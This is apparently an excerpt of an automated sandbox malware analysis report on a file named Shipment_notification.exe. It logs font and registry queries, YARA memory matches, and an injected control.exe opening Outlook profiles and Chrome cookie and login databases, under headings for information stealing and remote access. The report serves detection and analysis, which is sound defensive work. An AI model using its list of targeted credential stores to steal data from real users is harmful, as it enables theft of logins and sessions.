Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Shipment_notification.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

Remote Access Functionality

Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY